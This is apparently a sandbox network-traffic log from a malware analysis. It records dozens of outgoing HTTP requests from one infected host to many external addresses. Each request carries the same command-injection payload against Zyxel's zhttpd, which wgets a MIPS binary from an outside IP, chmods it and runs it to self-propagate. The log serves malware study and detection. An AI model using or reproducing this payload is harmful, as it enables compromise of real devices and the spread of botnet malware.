                                                Jan 12, 2024 18:24:22.523341894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1148192.168.2.1335768167.206.197.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.523344040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1149192.168.2.1335498159.242.97.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.523355007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1150192.168.2.1342046206.163.254.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.523360014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1151192.168.2.1342970117.61.59.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.523367882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1152192.168.2.1359270132.14.200.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.523387909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1153192.168.2.133543436.0.168.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.523403883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1154192.168.2.134395823.225.67.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.523433924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1155192.168.2.134955432.138.127.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.523480892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1156192.168.2.1360354161.227.217.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.523536921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1157192.168.2.134531074.55.3.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.523566961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1158192.168.2.1343482216.177.192.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.523612022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1159192.168.2.133942441.46.161.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.523646116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1160192.168.2.133469245.39.248.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.523682117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1161192.168.2.1335134128.112.145.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.523719072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1162192.168.2.135327813.171.22.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.523782969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1163192.168.2.133951049.41.218.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.527365923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1164192.168.2.133281849.201.195.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.527398109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1165192.168.2.1354430165.53.67.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.527456999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1166192.168.2.135229066.29.166.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.535418034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1167192.168.2.136062641.106.12.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.535476923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1168192.168.2.13442229.99.235.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.535506010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1169192.168.2.1339122169.170.70.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.535559893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1170192.168.2.1345956162.28.80.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.535592079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1171192.168.2.135777275.77.145.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.535681963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1172192.168.2.1342890107.250.125.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.535708904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1173192.168.2.1340958174.90.233.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.535717964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1174192.168.2.1357632120.166.43.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.535749912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1175192.168.2.13585328.177.168.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.535763979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1176192.168.2.134782895.15.204.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.535801888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1177192.168.2.135301097.69.234.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.535834074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1178192.168.2.1343062118.43.19.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.535912991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1179192.168.2.135846054.72.90.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.535922050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1180192.168.2.1340780110.208.37.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.535939932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1181192.168.2.1358984147.187.24.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.535988092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1182192.168.2.134838240.230.51.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.536042929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1183192.168.2.1359618202.239.237.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.536082983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1184192.168.2.1348626137.63.192.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.536140919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1185192.168.2.1360952181.104.217.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.536179066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1186192.168.2.1342254170.173.174.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.536214113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1187192.168.2.1352310142.157.85.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.536231995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1188192.168.2.1352324203.9.122.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.536273956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1189192.168.2.13523005.73.255.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.536302090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1190192.168.2.1340712101.101.130.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.536362886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1191192.168.2.1347896159.111.169.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.536382914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1192192.168.2.133326867.193.141.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.536407948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1193192.168.2.1346140160.119.35.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.536459923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1194192.168.2.1338020179.149.196.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.536546946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1195192.168.2.1355616115.246.25.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.536554098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1196192.168.2.1339472167.63.116.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.536583900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1197192.168.2.135601692.33.31.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.536627054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1198192.168.2.134445642.77.25.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.536652088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1199192.168.2.1343958131.60.115.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.536710024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1200192.168.2.1332998144.142.121.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.536741018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1201192.168.2.1337458139.139.181.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.536770105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1202192.168.2.1353216171.191.171.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.536807060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1203192.168.2.1339930156.4.197.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.536834002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1204192.168.2.1336706180.84.11.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.536873102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1205192.168.2.136001058.247.189.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.536900997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1206192.168.2.1351832125.221.45.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.536927938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1207192.168.2.1354976138.180.41.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.536998987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1208192.168.2.1341066166.13.83.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.537044048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1209192.168.2.1348308171.149.166.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:23.537087917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1210192.168.2.1334772118.236.156.254443
                                                TimestampBytes transferredDirectionData
